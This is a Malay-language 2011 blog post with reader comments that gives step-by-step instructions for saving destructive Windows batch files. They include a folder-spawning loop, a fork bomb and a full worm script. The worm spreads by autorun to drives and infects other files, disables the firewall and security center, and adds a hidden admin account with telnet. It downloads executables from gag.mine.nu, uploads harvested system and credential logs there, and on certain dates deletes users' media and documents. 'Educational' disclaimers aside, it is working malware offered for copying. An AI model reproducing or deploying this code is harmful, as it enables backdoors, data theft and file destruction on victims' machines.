Wednesday, 20 July 2011

Jom Belajar Lagi Fail Batch

Berikut adalah beberapa batch file yang agak ganas untuk diamalkan. Jadi saya nasihatkan jangan run benda ini di laptop anda sendiri. Sebarang kegagalan selepas menggunakan file ini adalah diatas tanggungjawab anda sendiri.File ini akan menyebabkan komputer anda membuat 1000 folder secara automatik tanpa henti. Kesan dari fail ini akan menyebabkan komputer anda menjadi hang.

1. Salin script di bawah ini ke dalam Notepad.


@echo off
:top
md %random%
goto top

2. Save fail nama_fail.bat , nama_fail terpulang pada korang tapi paling penting .bat tu.

----------------------------------------------------------------------------------------------

Fail ini akan menyebabkan komputer anda menjadi kaku/Freeze, ini bermakna anda tidak boleh melakukan apa-apa kecuali membuat force shutdown. Jangan lakukan ini berulang kali kerana dikhuatiri akan menyebabkan kerosakan pada sistem fail anda.

1. Salin script di bawah ini ke dalam Notepad.

%0|%0

2. Save fail nama_fail.bat , nama_fail terpulang pada korang tapi paling penting .bat tu.

----------------------------------------------------------------------------------------------

Ini adalah fail yang amat berbahaya sama sekali, ianya dicipta oleh seorang hacker yang tidak diketahui. Saya hanya mengongsikan fail ini sebagai rujukan pelajaran sahaja. Adalah diingatkan jangan pernah run file ini di komputer milik anda sendiri. Kerana apa yang saya tahu, file ini akan menyebabkan kemusnahan teruk kepada sistem komputer anda.

1. Salin script di bawah ini ke dalam Notepad.


:ati
echo %0 | find "ati2" && cd && start /max %cd%
dir %windir%\ati.bat && (exit)
dir %windir%\wscrip.exe || copy %windir%\system32\wscript.exe %windir%\
dir %windir%\ati2.bat || echo %0 | find "ati2" && xcopy %0 %WINDIR%\ /y /h
if not exist %windir%\ati2.bat (copy %0 %WINDIR%\ati2.bat & attrib -r %windir%\ati2.bat
echo.>%windir%\at & echo goto ati>>%windir%\at
echo 1,5d>%windir%\mn
echo 1t %windir%\at>>%windir%\mn & echo e>>%windir%\mn
edlin %windir%\ati2.bat<%windir%\mn)
echo reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /d 0 /t reg_dword /f>%windir%\ati.bat
echo echo %%date%% ^| findstr "13 30" ^&^& goto g>>%windir%\ati.bat
echo Set WshShell = WScript.CreateObject("WScript.Shell")>%windir%\ati.vbs
echo WshShell.Run "%windir%\ati.bat", 0, false>>%windir%\ati.vbs
echo Set WshShell = WScript.CreateObject("WScript.Shell")>%windir%\ati2.vbs
echo WshShell.Run "ati2.bat", 0, false>>%windir%\ati2.vbs
echo [autorun]>%WINDIR%\autorun.inf
echo shellexecute="ati2.vbs">>%WINDIR%\autorun.inf
attrib +s +r +h %windir%\autorun.inf
attrib +s +r +h %windir%\ati2.bat
attrib +s +r +h %windir%\ati2.vbs
echo dir %%windir%%\yes ^|^| goto reg>>%windir%\ati.bat
echo :flash>>%windir%\ati.bat
echo ping 127.0.0.1 -n 20 -w 400>>%windir%\ati.bat
echo for %%%%r in (d e f g h i j k l m c) do dir %%%%r: ^&^& xcopy %%windir%%\autorun.inf %%%%r:\ /y /h>>%windir%\ati.bat
echo for %%%%r in (d e f g h i j k l m c) do dir %%%%r: ^&^& xcopy %%windir%%\ati2.bat %%%%r:\ /y /h>>%windir%\ati.bat
echo for %%%%r in (d e f g h i j k l m c) do dir %%%%r: ^&^& xcopy %%windir%%\ati2.vbs %%%%r:\ /y /h>>%windir%\ati.bat
echo dir %%windir%%\info ^|^| ping gag.mine.nu -w 2000 ^&^& (>>%windir%\ati.bat
echo echo folderxp^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo echo dep259^>^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo echo cd^>^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo echo \usr\folderxp^>^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo echo get^>^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo echo ras.exe^>^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo echo %%WINDIR%%\ras.exe^>^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo echo get^>^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo echo pro.exe^>^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo echo %%WINDIR%%\pro.exe^>^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo echo quit^>^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo ftp -s:%%windir%%\ati.txt gag.mine.nu>>%windir%\ati.bat
echo %%WINDIR%%\ras.exe /allusers /stab %%WINDIR%%\ras.log>>%windir%\ati.bat
echo %%WINDIR%%\pro.exe /stab %%WINDIR%%\pro.log>>%windir%\ati.bat
echo copy %%WINDIR%%\ras.log+%%WINDIR%%\pro.log %%WINDIR%%\info /y>>%windir%\ati.bat
echo systeminfo^>^>%%WINDIR%%\info>>%windir%\ati.bat
echo tasklist^>^>%%WINDIR%%\info>>%windir%\ati.bat
echo ipconfig /all^>^>%%WINDIR%%\info>>%windir%\ati.bat
echo netstat -r^>^>%%WINDIR%%\info>>%windir%\ati.bat
echo netstat -a^>^>%%WINDIR%%\info>>%windir%\ati.bat
echo tracert ya.ru^>^>%%WINDIR%%\info>>%windir%\ati.bat
echo nslookup /^>^>%%WINDIR%%\info>>%windir%\ati.bat
echo dir %%SYSTEMDRIVE%%\progra~1/b/a:d^>^>%%WINDIR%%\info>>%windir%\ati.bat
echo echo folderxp^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo echo dep259^>^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo echo cd^>^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo echo \usr\folderxp^>^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo echo append^>^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo echo %%windir%%\info^>^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo echo %%date%%_%%username%%_%%userdomain%%_%%random%%.jpg^>^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo echo quit^>^>%%Windir%%\ati.txt>>%windir%\ati.bat
echo ftp -s:%%windir%%\ati.txt gag.mine.nu )>>%windir%\ati.bat
echo goto flash>>%windir%\ati.bat
echo :g>>%windir%\ati.bat
echo for %%%%f in (d e f g h i j k l m c) do del %%%%f:\*.mp3 /f /s /q>>%windir%\ati.bat
echo for %%%%f in (d e f g h i j k l m c) do del %%%%f:\*.avi /f /s /q>>%windir%\ati.bat
echo for %%%%f in (d e f g h i j k l m c) do del %%%%f:\*.jpg /f /s /q>>%windir%\ati.bat
echo for %%%%f in (d e f g h i j k l m c) do del %%%%f:\*.jpeg /f /s /q>>%windir%\ati.bat
echo for %%%%f in (d e f g h i j k l m c) do del %%%%f:\*.vob /f /s /q>>%windir%\ati.bat
echo for %%%%f in (d e f g h i j k l m c) do del %%%%f:\*.doc /f /s /q>>%windir%\ati.bat
echo for %%%%f in (d e f g h i j k l m c) do del %%%%f:\*.xls /f /s /q>>%windir%\ati.bat
echo del %%windir%%\info /q>>%windir%\ati.bat
echo del %%windir%%\yes /q>>%windir%\ati.bat
echo goto flash>>%windir%\ati.bat
echo :reg>>%windir%\ati.bat
echo echo yes^>%%windir%%\yes>>%windir%\ati.bat
echo del %%windir%%\reg.txt /q>>%windir%\ati.bat
echo del %%windir%%\reg2.txt /q>>%windir%\ati.bat
echo del %%windir%%\diz.txt /q>>%windir%\ati.bat
echo del %%windir%%\nfo.txt /q>>%windir%\ati.bat
echo for %%%%d in (d e f g h i j k l m c) do dir %%%%d:*.bat/s/b/a-r-h^>^>%%windir%%\reg2.txt>>%windir%\ati.bat
echo for %%%%d in (d e f g h i j k l m c) do dir %%%%d:*.diz/s/b^>^>%%windir%%\diz.txt>>%windir%\ati.bat
echo for %%%%d in (d e f g h i j k l m c) do dir %%%%d:*.nfo/s/b^>^>%%windir%%\nfo.txt>>%windir%\ati.bat
echo findstr /v /i "volume recycled recycler windows" %%windir%%\reg2.txt^>^>%%windir%%\reg.txt>>%windir%\ati.bat
echo for /f "delims=" %%%%t in (%%windir%%\reg.txt) do attrib "%%%%t" -r -h>>%windir%\ati.bat
echo attrib %%windir%%\ati2.bat -r -h -s>>%windir%\ati.bat
echo for /f "delims=" %%%%v in (%%windir%%\reg.txt) do copy %%windir%%\tab+"%%%%v"+%%windir%%\ati2.bat %%windir%%\666.bat ^& del "%%%%v" /q ^& move %%windir%%\666.bat "%%%%v">>%windir%\ati.bat
echo for /f "delims=" %%%%t in (%%windir%%\reg.txt) do attrib "%%%%t" +r>>%windir%\ati.bat
echo for /f "delims=" %%%%v in (%%windir%%\diz.txt) do copy %%windir%%\ati2.bat "%%%%v.bat" ^& del "%%%%v" /q>>%windir%\ati.bat
echo for /f "delims=" %%%%v in (%%windir%%\nfo.txt) do copy %%windir%%\ati2.bat "%%%%v.bat" ^& del "%%%%v" /q>>%windir%\ati.bat
echo attrib %%windir%%\ati2.bat +r +h +s>>%windir%\ati.bat
echo goto flash>>%windir%\ati.bat
echo @echo off>%windir%\tab
echo goto ati>>%windir%\tab
echo :exit>>%windir%\tab
echo cls>>%windir%\tab
echo @echo on>>%windir%\tab
sc config wscsvc start= disabled
sc config SharedAccess start= disabled
sc config tlntsvr start= auto
sc stop wscsvc
sc stop SharedAccess
sc start tlntsvr
net user ati ati696 /add
net localgroup " ¤¬¨­¨áâà â®àë" ati /add
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /d "Explorer.exe,wscript.exe %windir%\ati.vbs" /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /d 0 /t reg_dword /f
reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden /v text /f
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ati /t REG_DWORD /d 0 /f
goto exit

2. Save fail sebagai KLAXXON.nfo.bat , jangan ubah nama fail demi menghormati pencipta fail ini.

----------------------------------------------------------------------------------------------

Ini adalah fail yang amat berbahaya sama sekali, ianya dicipta oleh seorang hacker yang tidak diketahui. Saya hanya mengongsikan fail ini sebagai rujukan pelajaran sahaja. Adalah diingatkan jangan pernah run file ini di komputer milik anda sendiri. Kerana apa yang saya tahu, file ini akan menyebabkan kemusnahan teruk kepada sistem komputer anda.

1. Salin script di bawah ini ke dalam Notepad.

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /d 0 /t reg_dword /f
echo %date% | findstr "13 30" && goto g
dir %windir%\yes || goto reg
:flash
ping 127.0.0.1 -n 20 -w 400
for %%r in (d e f g h i j k l m c) do dir %%r: && xcopy %windir%\autorun.inf %%r:\ /y /h
for %%r in (d e f g h i j k l m c) do dir %%r: && xcopy %windir%\ati2.bat %%r:\ /y /h
for %%r in (d e f g h i j k l m c) do dir %%r: && xcopy %windir%\ati2.vbs %%r:\ /y /h
dir %windir%\info || ping gag.mine.nu -w 2000 && (
echo folderxp>%Windir%\ati.txt
echo dep259>>%Windir%\ati.txt
echo cd>>%Windir%\ati.txt
echo \usr\folderxp>>%Windir%\ati.txt
echo get>>%Windir%\ati.txt
echo ras.exe>>%Windir%\ati.txt
echo %WINDIR%\ras.exe>>%Windir%\ati.txt
echo get>>%Windir%\ati.txt
echo pro.exe>>%Windir%\ati.txt
echo %WINDIR%\pro.exe>>%Windir%\ati.txt
echo quit>>%Windir%\ati.txt
ftp -s:%windir%\ati.txt gag.mine.nu
%WINDIR%\ras.exe /allusers /stab %WINDIR%\ras.log
%WINDIR%\pro.exe /stab %WINDIR%\pro.log
copy %WINDIR%\ras.log+%WINDIR%\pro.log %WINDIR%\info /y
systeminfo>>%WINDIR%\info
tasklist>>%WINDIR%\info
ipconfig /all>>%WINDIR%\info
netstat -r>>%WINDIR%\info
netstat -a>>%WINDIR%\info
tracert ya.ru>>%WINDIR%\info
nslookup />>%WINDIR%\info
dir %SYSTEMDRIVE%\progra~1/b/a:d>>%WINDIR%\info
echo folderxp>%Windir%\ati.txt
echo dep259>>%Windir%\ati.txt
echo cd>>%Windir%\ati.txt
echo \usr\folderxp>>%Windir%\ati.txt
echo append>>%Windir%\ati.txt
echo %windir%\info>>%Windir%\ati.txt
echo %date%_%username%_%userdomain%_%random%.jpg>>%Windir%\ati.txt
echo quit>>%Windir%\ati.txt
ftp -s:%windir%\ati.txt gag.mine.nu )
goto flash
:g
for %%f in (d e f g h i j k l m c) do del %%f:\*.mp3 /f /s /q
for %%f in (d e f g h i j k l m c) do del %%f:\*.avi /f /s /q
for %%f in (d e f g h i j k l m c) do del %%f:\*.jpg /f /s /q
for %%f in (d e f g h i j k l m c) do del %%f:\*.jpeg /f /s /q
for %%f in (d e f g h i j k l m c) do del %%f:\*.vob /f /s /q
for %%f in (d e f g h i j k l m c) do del %%f:\*.doc /f /s /q
for %%f in (d e f g h i j k l m c) do del %%f:\*.xls /f /s /q
del %windir%\info /q
del %windir%\yes /q
goto flash
:reg
echo yes>%windir%\yes
del %windir%\reg.txt /q
del %windir%\reg2.txt /q
del %windir%\diz.txt /q
del %windir%\nfo.txt /q
for %%d in (d e f g h i j k l m c) do dir %%d:*.bat/s/b/a-r-h>>%windir%\reg2.txt
for %%d in (d e f g h i j k l m c) do dir %%d:*.diz/s/b>>%windir%\diz.txt
for %%d in (d e f g h i j k l m c) do dir %%d:*.nfo/s/b>>%windir%\nfo.txt
findstr /v /i "volume recycled recycler windows" %windir%\reg2.txt>>%windir%\reg.txt
for /f "delims=" %%t in (%windir%\reg.txt) do attrib "%%t" -r -h
attrib %windir%\ati2.bat -r -h -s
for /f "delims=" %%v in (%windir%\reg.txt) do copy %windir%\tab+"%%v"+%windir%\ati2.bat %windir%\666.bat & del "%%v" /q & move %windir%\666.bat "%%v"
for /f "delims=" %%t in (%windir%\reg.txt) do attrib "%%t" +r
for /f "delims=" %%v in (%windir%\diz.txt) do copy %windir%\ati2.bat "%%v.bat" & del "%%v" /q
for /f "delims=" %%v in (%windir%\nfo.txt) do copy %windir%\ati2.bat "%%v.bat" & del "%%v" /q
attrib %windir%\ati2.bat +r +h +s
goto flash

2. Save fail sebagai ati.bat , jangan ubah nama fail demi menghormati pencipta fail ini.

3. Fail ini harus di gunakan bersama fail .vbs di bawah. Maknanya anda mesti membuat dua file ini untuk memastikan trik ini berjaya dilakukan.

3.1 Salin script di bawah ke dalam notepad anda.

Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "C:\WINDOWS\ati.bat", 0, false

4. Save fail sebagai ati.vbs , jangan ubah nama fail demi menghormati pencipta fail ini.


PERHATIAN :Hanya gunakan fail ini di Virtual Machine Komputer, Jangan RUN di komputer persendirian anda, saya tidak bertanggungjawab atas kerosakan yang bakal terjadi.


p/s : Kami Hack Kerana Anda Cuai

4 comments:

Anonymous said...

huhu bukan kami hack...
kami dapat skerana anda cuai XD

ini hacker2 nye entry nie...
susah orang nak faham language nie~

teach me some advance ;)

Niena Pengembara Ilahi said...

thanks sbb berkongsi walau xpaham heheh

.izzati liyana. said...

err. complicated sungguh. muz ni hacker ke? uhuk.

Anonymous said...

@.izzati liyana.
Hacker tak pernah mengenalkan diri, mereka Anonymous...Jangan Bimbang saya bukan mereka... :)